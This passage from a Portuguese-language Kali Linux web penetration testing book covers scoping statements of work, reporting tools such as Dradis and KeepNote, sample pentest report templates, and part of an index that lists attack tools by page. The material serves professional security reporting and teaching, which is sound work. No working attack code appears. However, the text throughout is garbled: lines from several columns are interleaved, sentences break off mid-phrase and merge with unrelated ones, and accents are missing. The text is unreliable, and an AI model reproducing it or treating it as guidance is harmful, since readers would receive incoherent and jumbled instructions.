completar os seguintes procedimentos usando exploits geradas isso pr-aprovado palavreado dos Preo: Quanto tempo o trabalho
de teste para a web dinamicamente, emulando advogados necessrio para concluir e quanto ele
domnio de aplicao: um hacker tentando vrios caminhos e excluindo-se os proprietrios de vai custar.
mtodos de ataque. aplicativos de realizar o prestador de Isso pode ser dividido em fases de
Demonstrar as conseqncias de um servio responsvel por projeto e deve incluir notao
ataque atravs da interao com o quaisquer danos causados pelo teste horas quando esperados
servidor web de penetrao. potencialmente poderia exceder preo
sistemas e bases de dados atravs de Metodologia e abordagem: Isto projetado.
shells de comando e consoles de como voc pretende conduzir a As expectativas e responsabilidades:
banco de dados de arquivo. penetrao O que o prestador de servios eo
Realizar testes de penetrao sem Test (regras de engajamento), como o cliente
corromper aplicaes web ou em cliente recebe atualizaes, so atribudos durante o ciclo de vida
execuo cronogramas, do projeto. Deve haver notaes
Identificar os servidores a serem cdigo em servidores de destino. e como o cliente pode fornecer quando
testados, com base no site do cliente Responsabilidades do cliente so os entrada. O diagrama a seguir fornece passos necessrios por qualquer
e rastreamento seguintes: uma prestador de servios ou cliente um
um site para endereos colheita exemplo de uma metodologia SOW: pr-requisito para a
publicado no site. futuro etapa do projeto.
Alavancar os principais motores de Identificar o domnio web para o qual a Cartografia [298]
busca para localizar endereos para avaliao web ser executada. e
um determinado domnio. Descoberta
Captulo 8 Armazenamento, SP) eEye Retina e fornecer uma senha que ser
SAINT Certified Engineers Ameaa Guarda compartilhado entre os membros da
Credenciais e ferramentas: Qualys Certified Engineers [299] equipe.
Normalmente, os clientes verificar as Projeto sem fio Cisco Avanado Para iniciar sesso, crie um nome e
credenciais detidos pelo Especialista Penetration Test Relatrio Executivo fornecer uma senha. Isso vai coloc-lo
pessoal a realizao de auditorias, Project Management Professional do Kali ferramentas de relatrios no principal
bem como quais as ferramentas pode PMI (PMP) Kali Linux inclui uma pequena seleo dashboard. Confira os assistentes e
ser usada para completar Especialista Cisco Avanado Campo de ferramentas que podem ser usadas vdeos de demonstrao para
tarefas. O fornecimento dessas de Segurana para a comunicao aprender mais sobre como usar
informaes em uma DT acrescenta Especialista Cisco Avanado Campo organizar como uma equipe de Dradis em seus servios.
um grau de credibilidade sem fio captura da informao, bem como [300]
e profissionalismo. Fornecer o Cisco Mestre Segurana parceiro alguns utilitrios de criptografia.
potencial inicial conjunto de especializado Aqui est um breve resumo de Captulo 8
ferramentas tambm reduz importante abordar as algumas das ferramentas que KeepNote
a probabilidade de que o cliente tenha preocupaes que voc acredita que poderiam beneficiar a sua penetrao KeepNote um aplicativo de
uma reao negativa quando um podem surgir adiantado. Nosso prtica de teste. anotaes. Voc pode armazenar
negativo colega e amigo Willie Rademaker tem Dradis muitos tipos de notas e rapidamente
impacto ocorre devido ao uso de uma uma frase clebre: "Sempre Dradis um framework open source ver tudo usando uma hierarquia de
ferramenta. jogue o peixe na mesa ". Em outras para compartilhamento de notebook com texto rico e formatao
O exemplo a seguir mostra uma tabela palavras, evitar ter surpresas quando informaes. Dradis fornece um de imagem.
que destaca uma amostra de um projeto est sendo escopo. Se repositrio centralizado de KeepNote pode ser encontrado em
Penetrao Rester voc acredita que pode haver um informaes para acompanhar o que Ferramentas de Relatrios
percia, juntamente com as ponto de foi feito e |Documentao e selecionando
ferramentas que sero utilizadas: conteno, abord-la na cabea. ainda precisa ser concluda. Dradis KeepNote.
Certificaes e Credentials Surpresas so para aniversrios ... pode coletar informaes de membros Maltego CaseFile
ISC2 Certified Information Security no de negcios. da equipe, CaseFile uma aplicao de
Professional (CISSP) Testando Ferramentas fornecer ferramentas como o Nessus inteligncia visual usado para
International Council of E-Commerce Kali Linix e Qualis, bem como a importao de determinar as relaes e
Consultants (CEH) Backtrack 5 RC3 informaes, tais como mundo real liga entre centenas de
Information Systems Audit and Control AirSnort listas de vulnerabilidade. diferentes tipos de informao. Isto faz
Association (ISACA) AirCrack Para abrir Dradis, navegue at coleta de informaes e anlise de
Informaes Certified Systems Auditor Airsnarf Ferramentas de Relatrios relacionamentos fceis para as
(CISA) AirMagnet |Documentao e selecione Dradis. investigaes.
RSA Authentication v8.0 Gerente Impacto Ncleo Dradis acessado atravs de um MagicTree
RSA DLP Sute Certified Systems Santo navegador de Internet padro, MagicTree uma ferramenta de
Engineer (CSE) Rpido 7 simplificando a colaborao produtividade Tester Penetrao
RSA SecurID Escolha / Produtos Qualys entre grupos de pessoas. Para iniciar projetados para consolidao de
Cisco Certified Internetwork Expert Metasploit uma sesso, selecione Novo projeto dados,
(CCIE-RS, Segurana, Voz, Paliada para o Meta-Servidor
consulta, a execuo do comando Se voc no for o destinatrio 1.3.2 Vulnerabilidade B Este teste de penetrao foi realizada
externo e gerao de relatrios. A pretendido, estar ciente de que ............................................. durante <Date>. O relatrio detalhado
informao armazenada qualquer divulgao, ...................... 6 sobre cada
em uma estrutura de rvore, tornando cpia ou distribuio do contedo 1.3.3 Vulnerabilidade C. tarefa e nossos resultados so
mais fcil para identificar os resultados deste documento proibida. ............................................ descritos a seguir.
de exerccios anteriores e Detalhes do documento: ....................... 7 O objetivo do teste determinar as
formato para fins de relatrio. Empresa: CLIENTE 1.4 Recomendaes vulnerabilidades de segurana nas
[301] Documento: Relatrio de Teste de ................................................ configuraes
Invaso ................ 8 e aplicaes web em execuo nos
Penetration Test Relatrio Executivo Data: 1.5 Resumo servidores especificados como parte
CutyCapt Classificao: Pblico ................................................ do escopo do trabalho.
CutyCapt usado para capturar a Destinatrio: Empresa, nome, ttulo ............................ 10 Os testes so realizados assumindo a
pgina web de renderizao do Histria de Documento: 2 Relatrio tcnico identidade de um atacante ou um
Webkit em uma variedade de bitmap Data: Verso, autor, comentrios ............................................... usurio com malicioso
e formatos vetoriais que incluem SVG, 1.0 Projecto .................. 12 inteno.
PDF, PS, PNG, JPEG, TIFF, BMP e 2.0 Review 2.1 A segurana da rede 1.1.1 Abordagem
GIF. Contedo: ...............................................
Exemplos de relatrios 1 Sumrio Executivo ................ 12
A seguir, exemplo relatrios que voc ............................................... 2.1.1 ITEM 1 Realizar exames gerais para
pode usar como modelos para as ................. 4 ............................................. identificar potenciais reas de
entregas de construo para 1.1 Resumo ...................... 12 exposio e servios que
seus clientes: ................................................ 2.1.2 ITEM 2 podem agir como pontos de entrada.
Reportar testes de penetrao para o ............................. 4 ............................................. Realizar exames e investigaes para
cliente do PRESTADOR DE 1.1.1 Abordagem ...................... 14 validar vulnerabilidades encontradas
SERVIOS: .............................................. 2.2 vulnerabilidades em aplicaes alvo
Este documento contm informaes ............................ 4 Web ............................................ 16 dos alvos identificados durante as
de provedor de servio que [302] 3 Concluso verificaes gerais.
confidenciais e privilegiadas. A ................................................ [303]
informao destinado para o privado Captulo 8 ........................ 21
uso de CLIENTE. Ao aceitar este 1.2 Escopo Apndice Penetration Test Relatrio Executivo
documento, voc concorda em manter ................................................ .................................................
o ................................. 5 .............................. 22
contedos em confiana e no copiar, 1.3 Principais concluses Sumrio Executivo
divulgar ou distribuir este sem ............................................... 1.1 Sumrio
confirmao pedido por escrito para e .............................. 6 CLIENTE atribuiu a tarefa de realizar
por escrito do PRESTADOR DE 1.3.1 Vulnerabilidade A testes de penetrao de Quarterly
SERVIOS. ............................................. <domnio>, ao PRESTADOR DE Teste de componentes identificados
...................... 6 SERVIOS. para obter acesso.
Identificar e validar vulnerabilidades.
Classificao vulnerabilidades com Explicao de vulnerabilidade Recomendao 3 Nmero de Vulnerabilidades
base no nvel de ameaa, o potencial encontrada. Recomendao 4 Alta, mdia e informaes gravidade
de perda e probabilidade de Recomendao para corrigir Recomendao 5 vulnerabilidades
explorao. vulnerabilidade. 1.4.2 Recomendaes Estratgicas 100
Realizar atividades de pesquisa e 1.3.3 Vulnerabilidade C 35
desenvolvimento para apoiar a Explicao de vulnerabilidade As avaliaes de segurana pr-ativa: 21
anlise. Identificar encontrada. Como parte das melhores prticas de 68
questes de conseqncia imediata e Recomendao para corrigir segurana; Descrio
recomendar solues. vulnerabilidade. O CLIENTE dever assegurar que [305]
Fornecer recomendaes para 1.4 Recomendaes quaisquer mudanas importantes para
melhorar a segurana. [304] a sua Internet Penetration Test Relatrio Executivo
Transferncia de conhecimento. de frente para a infra-estrutura tem 2.1 Segurana de Rede
Durante as verificaes de segurana Captulo 8 outra avaliao de segurana externa. 2.1.1 ITEM 1
de nvel de rede, buscou-se investigar PRESTADOR DE SERVIOS AO Este um Descrio:
as portas apresentar em CLIENTE recomenda desenvolver um precauo ao impacto de alteraes Durao Servio: SMTP, HTTP,
vrios servidores e detectar servios plano de ao para o endereo feitas conforme recomendado a partir POP3, HTTPS
em execuo com as falhas de problemas descobertos durante esta desta Servio Detalhes Verso:
segurana existentes, se houver. avaliao. documento. Anlise
No nvel do aplicativo web, fizemos o As recomendaes deste relatrio so Intrusion Detection / Prevention (IDS / Descrio
check-configurao dos servidores classificados como ttico ou IPS): Redes expostas ao Nvel de Gravidade
web 'e lgica estratgico. Ttico trfego potencialmente hostil deve Mdio
erros no prprio aplicativo web. recomendaes so correes de implementar alguma capacidade de 2.1.2 ITEM 2
1.2 Escopo curto prazo para ajudar a elevar a detectar REPEAT
O escopo deste Penetration Test foi segurana imediata intruses. Investigar uma soluo IDS Descrio sumria
limitado aos seguintes endereos IP. preocupaes. Recomendaes para a rede. Referncias: http://www.weblink.com
<endereo IP list> estratgicas concentrar no ambiente Automatizado de controle de acesso 2.2 vulnerabilidades em aplicaes
<endereo IP list> global, o futuro de rede: A melhor prtica Web
<endereo IP list> direes, e introduo de melhores automatizar o controle de Descrio dos riscos
1.3 Principais concluses prticas de segurana. Um dos quem eo que permitido o acesso Vulnerabilidade A
Esta seo apresenta um resumo das destaques do rede especfica. Vulnerabilidade B
questes crticas descobertos durante recomendaes segue: Vulnerabilidade C
a 1.4.1 Recomendaes tticos Vulnerabilidade D
Engajamento Teste de Invaso. 1.5 Resumo tabular Vulnerabilidade E
1.3.1 Vulnerabilidade A A tabela a seguir resume Avaliao da Vulnerabilidade F
Explicao de vulnerabilidade Vulnerabilidade do Sistema: Ameaa
encontrada. Categoria Nvel
Recomendao para corrigir Resumo da avaliao de Grave
vulnerabilidade. Recomendao 1 vulnerabilidade de Sistemas Grave
1.3.2 Vulnerabilidade B Recomendao 2 Nmero de Hosts ao vivo Grave
Moderado Nvel RELATRIO DE TESTE DE que simulava um ator malicioso
Moderado Baixo PENETRAO - Customer envolvido em um ataque direcionado
Baixo Baixo ndice analtico contra a empresa
Potencial Potencial Sumrio Executivo com os objetivos da seguinte forma:
Perda Corporativo Perda Corporativo Resumo dos resultados
Perda potencial Perda potencial Narrativa de Ataque
Perda potencial Perda potencial Avaliao de Vulnerabilidade de rede Identificar se um atacante remoto
Perda potencial Probabilidade de Avaliao Webserver Vulnerabilidade pode penetrar as defesas do CLIENTE
Perda potencial Explorao Privilege Escalation Determinar o impacto de uma falha de
Perda potencial Possibilidade de ser Mantendo o acesso a Alvos segurana em:
Perda potencial comprometida comprometidos
Probabilidade de Possibilidade de ser [307]
Explorao comprometida
Possibilidade de ser Recomendao Penetration Test Relatrio Executivo A integridade de segurana da
comprometida Remediao Privilege Escalation Domnio empresa
Possibilidade de ser Remediao Explorao contedo do banco de A confidencialidade das informaes
comprometida A experincia tem mostrado que um dados da empresa
Possibilidade de ser esforo concentrado para resolver os Atacante Controle de Operaes de A infra-estrutura interna e
comprometida problemas descritos nesta Clientes disponibilidade dos clientes da
Possibilidade de ser relatrio pode resultar em melhorias Concluso sistemas de informao
comprometida de segurana dramticas. A maioria Recomendaes Os resultados desta avaliao sero
Possibilidade de ser dos problemas identificados Classificao de Risco utilizados pelo Cliente para orientar as
comprometida exigem o conhecimento e Apndice A: Vulnerabilidade Detalhe e decises futuras
Possibilidade de ser compromisso com as boas prticas Mitigao quanto direo de seu programa de
comprometida em vez de alto nvel Vulnerabilidade A segurana da informao. Todos os
Recomendao skillsets tcnicos. Vulnerabilidade B testes e aes foram
Remediao Apndice Vulnerabilidade C conduzida sob condies controladas.
Remediao Esta seo fornece as imagens das Vulnerabilidade D Resumo dos resultados
Remediao vulnerabilidades conhecidas Apndice B: Lista de alteraes feitas [308]
Remediao apresentados no aos Sistemas Archmake
Remediao observaes e descobertas mesa. Apndice C: Sobre Offensive Security Captulo 8
Remediao Relatrio de teste de penetrao Sumrio Executivo Reconnaissance Rede foi realizado
[306] Cliente: PRESTADOR DE SERVIOS foi contra o espao de endereo
Endereo contratada para realizar um teste de fornecido pelo
Captulo 8 Informaes para contato penetrao contra CLIENTE com o entendimento de que
Descrio dos riscos Provedor de servios: Presena na web externo do cliente. A esta gama de alvos seria considerado
Vulnerabilidade G Endereo avaliao foi realizada de forma o escopo para este compromisso.
Vulnerabilidade H Informaes para contato Determinou-se que a empresa
Ameaa mantm
presena externa mnima, consistindo No decorrer do teste de penetrao porque pode ser descoberto Impor controle de mudanas em todos
em um site externo e outros servios externa, CLIENTE sofreu uma cascata remotamente atravs de varrimento os sistemas: As vulnerabilidades
identificado pelo PRESTADOR DE srie de violaes que levaram a automatizado. O impacto de comuns so
SERVIOS durante Reconnaissance condies que prejudicam diretamente explorar tais vulnerabilidades podem causado por erro humano. Muitos
de CLIENTE. a empresa como paralisar rede do cliente e marca. problemas de configurao incorreta
Ao rever a segurana do site principal bem como os seus clientes. Recomendaes poderia ser evitado
cliente, descobriu-se Os objetivos especficos do teste de Louvamos ao cliente para ser pr- atravs de uma mudana forte e
que um plugin vulnervel foi instalado. penetrao foram demonstrados como ativo na gesto de risco de tecnologia processo de controlo em todos os
Este plugin foi explorada com segue: e sistemas activos.
sucesso, segurana da rede por meio de Multifatorial Alavancagem e controle
levando ao acesso administrativo. aquisio de nossos servios. Devido de acesso baseado em funo: Alguns
Este acesso foi utilizada para obter Identificar se possvel a um atacante ao impacto da geral sistemas crticos
acesso interativo remoto para penetrar ciberntico do organizao como descoberto por Foram encontrados alavancando a
para o sistema operacional CLIENTE este teste de penetrao, os recursos segurana da senha como os nicos
subjacente, e, em seguida, defesas adequados meios de validar
encaminhado para privilgios de root. Determinar o impacto de uma falha de recomendado para ser alocado para pessoas autorizadas. A melhor prtica
PRESTADOR DE SERVIOS foi segurana em: assegurar que os esforos de ter, pelo menos, duas formas de
capaz de usar o acesso administrativo remediao so realizadas em autenticao, juntamente com a
foi identificar interno tempo hbil. Enquanto uma lista limitao do acesso conta de
recursos de rede. A vulnerabilidade abrangente de itens que devem ser administrao.
em um sistema interno foi aproveitado A integridade dos sistemas da implementadas Restringir o acesso a sistemas
para ganhar locais empresa. est para alm do mbito do presente crticos: Sistemas crticos devem ser
acesso ao sistema, que foi ento A confidencialidade das informaes compromisso, alguns itens de alto isolados a partir de
escalado para direitos de dos clientes da empresa. nvel so importantes para outros sistemas usando listas brancas,
administrador de domnio. Isto colocou A infra-estrutura interna e citar: ACLs, VLANs, e outros meios. O
toda a infra-estrutura da rede sob o disponibilidade das informaes do projeto
controle dos atacantes. cliente Implementar um programa de conceito de privilgio mnimo vai
Narrativa de Ataque sistemas. gerenciamento de patch: Muitas das limitar a quantidade de dano que um
<Network Vulnerability Assessment [309] vulnerabilidades identificadas atacante pode
Details> poderiam ser evitados com o provocado usando um recurso
<webserver Vulnerability Assessment Penetration Test Relatrio Executivo gerenciamento de patches adequada. comprometida. Consulte NIST SP
Details> Baseado servios fornecidos, foi Recomendamos seguinte 800-27 RevA11 para
<Privilege Escalation Details> determinado que um invasor remoto as orientaes descritas no NIST SP orientaes sobre a obteno de uma
<Maintaining Acesso ao Alvos seria capaz 800-408 como uma fonte para o linha de base de segurana para
comprometidos Details> para penetrar as defesas do cliente. O desenvolvimento de sistemas de TI.
<domain Escalation Privilege Details> vector invasor inicial identificado polticas de segurana para
<Database Contedo Explorao como crtico, gerenciamento de patches adequada.
Details> Isto ir reduzir o risco de
Concluso execuo de sistemas vulnerveis. Classificao de Risco
O risco global identificado pelo <Vulnerability A information> sobre citando para um projeto. Depois autenticao 175
provedor de servio para o cliente Resumo disso, quebrou os diferentes Autpsia 271-274
dividido Este captulo conclui este livro, componentes BIOS (Basic Input Output System)
entre crtica e Baixo, definida da fornecendo orientaes para o de um documento entrega prestao senha 173
seguinte forma. PRESTADOR DE desenvolvimento profissional de melhores prticas para a prestao Teste de caixa preta 9
SERVIOS identificado prestao de servios ao cliente de resultados para o seu Navegador Explorao quadro. Ver
trs vulnerabilidades crticas que relatrios de testes ps-penetrao. clientes. Ns adicionamos uma seo Carne
foram usados para obter acesso aos Invadir final que cobria algumas ferramentas ataque de fora bruta
clientes da interna sistemas e outras mos sobre o de relatrios disponveis em cerca de 107, 152
rede. trabalho tcnico divertido, no Kali Linux que poderia ajudar a gerar DirBuster 110-112
entanto, relatrios detalhados e informaes para suas entregas dos Hydra 107
prticas comerciais slidas pagar as clientes. WebSlayer 113-119
Crtico: Ameaa imediata para os contas. O que torna uma prtica de Realmente gostei de escrever este bulk_extractor 276
processos-chave de negcios servios profissionais livro e espero que o ajude com o seu BURP Proxy
Alta: Ameaa indireta a chave sucesso a capacidade de se tornar aplicativo web cerca de 218-221
processos de negcio / ameaa de um conselheiro de confiana para o Objetivos do teste de penetrao. Arrotar Aranha 221
negcio secundrio seu campo relacionado. Para Obrigado pela leitura. Funo Aranha, utilizando 222-225
processos requisitos de segurana, isso significa [311] Arrotar Aranha 221
[310] ajudar os clientes a atender s normas C
de conformidade, ndice Center for Internet Security (CIS) 254
Captulo 8 reduzir o risco de vulnerabilidades e Smbolos Autoridade de Certificao, OWASP-
melhorar a forma de identificar Opo-t 55 Zap 90
ameaas. A certificaes de 299
Meio: Indireta ameaa / parcial aos O primeiro tema abordado foi o acccheck 209 Certified Ethical Hacker (CEH) 287
processos de negcio cumprimento, porque esse um relatrio de actividade 296 Certified Information Security Systems
Baixa: No existe nenhuma ameaa mtodo comum para mostrar Guia Alertas, OWASP-Zap 92 Professional. Ver CISSP
direta; vulnerabilidade pode ser valor para a aquisio de servios. Expectativa de perda anual (ALE) 15 Chkrootkit 271
alavanca com outro Encontramos os clientes a encontrar Taxa Anual de Ocorrncia (ARO) 15 chntpw 161-164
vulnerabilidades oramento, quando houver risco apndices 294 CIA 14
O nvel de risco atual de sistemas de no cumprir um mandato ou reagir Application Delivery Controller (ADC) Cisco Protection Network Foundation
testados, com base no nvel de risco a um incidente recente, para saber aparelhos 264 (NFP) 254
mais elevado de resultados mais ataques na camada de aplicao 236 CISSP
em sistemas crtico durante os padres populares ir melhorar a sua comando apt-get update 212 cerca de 15, 175
testes, um total de trs (3) Crtica, dois capacidade de importar para seus arpspoof 193, 194 Fatores de 175
(2) Mdio, clientes. Em seguida, ns Valor Patrimonial (AV) 15 Clickjacking
e dois (2) foram identificados baixos olhou para os diferentes mtodos de ataque cerca de 177
vulnerabilidades. projeto de lei para os servios, bem cenrios, por scapy 238, 240 URL, ferramenta para download de
Apndice: Vulnerabilidade Detalhe como algumas coisas a olhar para fora Guia de configurao Attack, 178
com Mitigao WebSlayer 114 B
Carne credenciais 299 DirBuster Ferramentas de Explorao 30
cerca de 212 Proteco das Infra-(CIP) 280 cerca de 110-112 Guia Exploit, w3af 104
comando apt-get update 212 Cross-site scripting. Ver XSS Boto Relatrio 113 F
hook.js 214 Crunch 15-170 Distributed Denial of Service. Ver DNS Falso 245
instalao de 212 CutyCapt 302 DDoS comando fdisk-l
comeando 212 D DNS montagem 154
URL 212 DBPwAudit 210 alvo, identificao 55, 57 Federal Energy Regulatory
Sistema Beef 41 dc3dd 269, 270 DNSCHEF 245, 246 Comisso (FERC) 280
Binwalk 274 DDoS. 235 Reconnaissance DNS Federal de Processamento de
defesa tcnicas de 54, 55 Informaes
Defesa Clickjacking 264 cerca de 251 Domain Name System (DNS) 245 Standards (FIPS) 279
clientes 73 Defesa Clickjacking 264 DoS. Federal de Segurana da Informao
ataques do lado do cliente 129 defesa do bolinho 263, 264 cerca de 235 Lei de Gesto (FISMA) 280
do lado do cliente Penetrao Negao de Servio defesa 262 ataque, categorias 236 Ferret 192
Relatrio de teste 296 Man-in-the-middle defesa 259 Categorias de ataque de negao de Roteiro Fierce
clonagem 132 Defesa tira SSL 262 servio comando, para a execuo de 56
ferramentas de clonagem 259 teste 252 ataques na camada de aplicao 236 Anlise do Sistema de Arquivos
CmosPwd 173 Sistemas de Informao de Defesa ataques de protocolo 236 com Kali 267-269
Carto de Acesso Comum (CAC) 176 Agncia (DISA) 254 exausto sesso 236 Fimap
Common Log Format (CLF) 208 defesas, testes de volume baseado ataques 236 cerca de 234
observncia cerca de 252 Dradis 300 utilizando 234
cerca de 278 segurana da linha de base 253 Emalhe 198 findmyhash 173
cumprimento da indstria 278, 279 senha, polticas 256 dsniff FireFox Plugins
confidentility 283 gerenciamento de patches 254, 255 cerca de 193 cerca de 180
Biscoito Cadger Guia de Segurana Tcnico de comeando 195 arpspoof 193, 194
cerca de 184-186 Implementao [314] Biscoito Cadger 184-187
sesses reconhecidos 187 (STIG) 254 Biscoito Injector 182
sesso de informao pedido 187 Definio do alvo Espao 12 E Os cookies Gestor + 183
defesa do bolinho 263 Definio do sistema de destino (s) 11 Eletrnico coleta de dados, anlise, Emalhe 198
Biscoito Injector 182 Negao de Servio defesa 262 e Recuperao. (EDGAR) 40 dsniff 193-195
bolinhos Denial of Services. Ver DoS sistemas de e-mail Ettercap 196-198
cerca de 178 Departamento de Defesa (DOD) 254 explorando 105-107 Firesheep 180
ataques de seqestro de sesso, as ataque de dicionrio 152 Ettercap Greasemonkey 182
limitaes de 179 dictstat cerca de 196 Hamster 190-192
roubar 179 cerca de 171 opes de menu 197 man-in-the-middle ataque 193
Os cookies Gestor + 183 execuo 172 sumrio executivo 285, 286 Web Developer 180
folha de rosto 283 Dig (informaes de domnio groper) explorao Wireshark 187-190
guia rastreador, ProxyStrike 84 54 golos 19 Firesheep 180
creddump 174 forense digital 265, 266 ferramentas 19, 20 Bandeira
definindo 12 quebra de senha, caminhos 152 Barrilha padres 279
FOCA [315] ferramentas de quebra de senhas 155 padres da indstria
cerca de 66-72 Kali Linux cerca de 279, 280
URL, para download 67 Criceto 190-192 cerca de 17, 21 Fase Coleta de Informaes 282
Pegada de alvo Hardware Hacking 31 e VM imagem 29 Coleta de informaes 17, 30, 34
estabelecer 33 hashcat 159 DNSCHEF 245, 246 instalao
Acima de tudo 275 Hash-identificador 170 explorao 19 Kali Linux 22-27
forense 31 hashing 152 instalao, material de 22 Kali Linux, requisitos 22
Forensics Bota 266, 267 Seguro de Sade Portabilidade e instalar 22-28 Organizao Internacional para
ferramentas forenses Accountability Act (HIPAA) 253, 279 Inundator 248 Normalizao-
cerca de 271 hexinject 209 Manter Foothold, metas 20 o (ISO) 253, 287
Autpsia 271-274 sediar reportar 296 Physical Address Extension (PAE) 21 Intrusion Detection / Prevention
Binwalk 274 sediar a digitalizao escalao de privilgios 19, 20 (IDS / IPS) 305
bulk_extractor 276 cerca de 144 Reconnaissance 17 Inundator 248
Chkrootkit 271 com Nessus 145 elaborao de relatrios, ferramentas Iptables
Acima de tudo 275 Aba Mquinas, NMap 64 300 utilizado, para a criao de porto
Pasco 275 HTTrack em execuo, a partir de uma mdia redirecionamento 124-126
pdf-parser 275 cerca de 49, 257, 258 externa 21 [316]
Scalpel 276 comando, exibindo 51, 52 Siege 247
FoxyProxy diretrio, selecionando 50 SniffJoke 246 eporting Ferramentas 31
cerca de 216 comeando 50 configurao do sistema 21 Engenharia reversa 30
proxy, adicionando 217 utilizando 49 alvo, avaliando 18 Cheirando e Spoofing 30
comando 53 fping hbrido 152 TCPReplay 248 Teste de Stress 31
G Hidra conjunto de ferramentas 29-31 Servios do Sistema 31
GHDB cerca de 107-110 URL, para download 21 Anlise de Vulnerabilidade 30
cerca de 45 J Kali Linux, ferramentas Aplicaes Web 30
acessando 46 Java Applet de Ataque 134 Ferramentas de Explorao 30 Os ataques sem fio 30
tela inicial 48 ofertas de empregos 41 forense 31 KeepNote 301
consulta de pesquisa, a seleo de 47 Johnny Hardware Hacking 31 N
URL 46 cerca de 156 Coleta de informaes 30 Instituto Nacional de Padres e
GIAC Penetrao Tester (GPEN) 287 Guia Sada 158 Ferramenta de acesso Manter 30 Tecnologia-
glossrio 294 Guia Estatsticas 158 Ataques senha 30 logia (NIST) 280
Google Hacking 44, 45 utilizando 156 Eu Opo NAT 135
Banco de Dados do Google Hacking. John the Ripper ICMP Reconnaissance Nessus
Ver GHDB cerca de 119 tcnicas de 52, 53 cdigo de ativao, URL 145
Teste de caixa cinza 10 abertura 120 comando ifconfig 122 transferncia, para o Debian 145
Greasemonkey 182 operao 120 cumprimento da indstria sediar a digitalizao 145
H utilizando, em arquivo de senhas 121 linhas de base 279 instalao, em Kali 145, 146
hackers K diretrizes 279 usando 146-150
Nessus HomeFeed 145 Ferramentas de acesso Manter 20, 30 ferramentas 20 phrasendrescher 173
ProfessionalFeed Nessus 145 Maltego ferramentas de quebra de senha, Kali Physical Address Extension (PAE) 21
Netcat 106, 107 cerca de 57 cerca de 155 comando ping 52
Network Mapper. Ver NMap comeando 57 chntpw 161-164 Guia Ping, NMap 63
servidores de rede 73 utilizando 58 Crunch 168, 169 plugins guia, ProxyStrike 84
guia topologia da rede, NMap 63 Maltego caseFile 301 hashcat 159 Opo de encaminhamento porta 135
Intrusion Prevention Next Generation man-in-the-middle Johnny 156, 158 redirecionamento de porta
Sistemas (NGIPS) 216 cerca de 121 oclHashcat 159 configurando, Iptables usado 124-126
NMap defesa 259, 260 Ophcrack 165, 166, 167 escalao de privilgios
cerca de 59, 62 man-in-the-middle ataque 193 samdump2 161 cerca de 19
Hosts tab 64 Mdia de Segurana Controle de senhas golos 20
guia de topologia de rede 63 Acesso cerca de 119 servios profissionais 280, 281
novo perfil, criando 61 (MACsec) 261 rachaduras 151 Reviso do Projeto 282
Novo perfil ou de comando, Metasploit rachaduras, por hackers 152 ataques de protocolo 236
selecionando 61 cerca de 96-102 Linux senhas 155 seo proxy, Vega 88
Guia Ping 63 URL 98 polticas 256, 257 ProxyStrike
Boto Salvar alteraes 63 meterpreter 132 Senhas do Windows 153 cerca de 81, 82
janela de digitalizao 65 MITM. Ver man-in-the-middle Patator 210 guia rastreador 84
URL 59 MITM Proxy 143, 144 gerenciamento de patches 254, 255 guia 84 log
utilizando 59 MLA 277 consertar este sistema 292 plugins tab 84
Zenmap 65, 66 O Guia Generator Payload, WebSlayer URL 84
Zenmap, a abertura 60 Ophcrack 165-167 114 utilizando 82
North American Electric Reliability OTP (one-time passwords) 261 Stand-aplicativo de pagamento guia proxy, Vega 86
Corporation (NERC) 280 OWASP-Zap Segurana de Dados R
L cerca de 89 ard (PA-DSS) 280 RainbowCrack 152
Linux senhas 155 Alertas tab 92 Payment Card Industry Data Security RainbowCrack (rcracki_mt) 172
guia log, ProxyStrike 84 Certificate Authority 90 Padro (PCI DSS) 253, 280 tabelas do arco-ris 152
Janela Log, w3af 104 Gerar 90 pdf-parser 275 Atacantes reais 11
LOIC 89 boto Gerar Penetrao Teste Relatrio Executivo Reconhecimento
cerca de 242 Relatrio HTML 94 277, 278 cerca de 17, 18, 33
instalao de 243 mercado 94 Teste de Invaso site da empresa 35
o lanamento de 244 [317] cerca de 7, 8, 16 Reconnaissance DNS, tcnicas de 53,
utilizando 244 Teste de caixa preta 9 55
Low Orbit Ion Cannon. Ver LOIC Guia Relatrio 94 Teste de caixa cinza 10 Identificao do alvo DNS 55, 57
M Sites janela 91 aplicao web 8, 9 Eletrnico coleta de dados, anlise e
MagicTree 301 P Teste de caixa branca 9, 10 Retrieval (EDGAR) 40
Manter Foothold Pasco 275 trabalho, alcance 11 FOCA 66-72
cerca de 20 Ataques senha A verificao de identidade pessoal Google Hacking 44, 45
golos 20 cerca de 30 (PIV) 176
Google Hacking banco de dados procedimentos de teste, detalhado Sensvel Informaes Compartmented engenharia social 129, 130
(GHDB) 45-48 288 Facility (SCIF) 283 Ataques de engenharia social 134
HTTrack 49-52 cronograma 284 servidor 73 Sociais Toolkit Engenharia. Ver SET
ICMP Reconnaissance, tcnicas de vulnerabilidades 290, 292 ataques do lado do servidor 74 mdias sociais
52, 53 Reporting Tools 31 servios comandar 98 cerca de 41
trabalho, postagens 41 ferramentas de relatrios, Kali Linux exausto sesso 236 SOW
localizao 42 CutyCapt 302 gerenciamento de sesses cerca de 284, 295
Maltego 57, 58 Dradis 300 cerca de 177 relatrio de actividade 296
redes, pesquisando 48, 49 KeepNote 301 SET do lado do cliente Penetrao
Nmap 59-62 MagicTree 301 cerca de 130, 131, 230, 231 Relatrio de teste 296
objetivos 34 Maltego caseFile 301 falso e-mail, o envio de 141, 142 relatrio executivo 295
Registros Regionais da Internet (RIRs) amostra relata 302-310 meterpreter 139 relatrio executivo, exemplo 295
39 Guia Relatrio, OWASP-Zap 94 a criao de 131, 132 sediar reportar 296
pesquisa 34 Os pedidos de Preos (RFP) Cloner site 140 o material 298, 299
Shodan 42 cerca de 281 modelo, a seleo de 232 testes de penetrao, externo 296,
[318] Guia Resultados, w3af 104 nome de utilizador, inserindo 233 297
Engenharia reversa 30 utilizando, para atacar 132-134 relatrio de um utilizador 296
mdia social, recursos 41 Fase de reviso 282 utilizando, para clonar 132-134 relatrio vulnerabilidade 296
confiana 41 RIRs 39 Definir senha colheita. Ver SET SQL
histrico da web, fontes de 36-38 Arquivo robots.txt 35 Shodan 42 cerca de 200, 201
Registros Regionais de Internet. Ver S Sidejacking 190 injeo de 202, 203
RIRs salga 152 Siege 247 SqlMap 203, 204
relatrio samdump2 161 Expectativa de perda nica. Ver SLE SqlMap 203, 204
documentao 282 SAM (Account Management System) Cloner site 140 Tira SSL 122, 123
relatrio executivo 285, 286 regis- Janela Sites, OWASP-Zap 91 Defesa tira SSL 261, 262
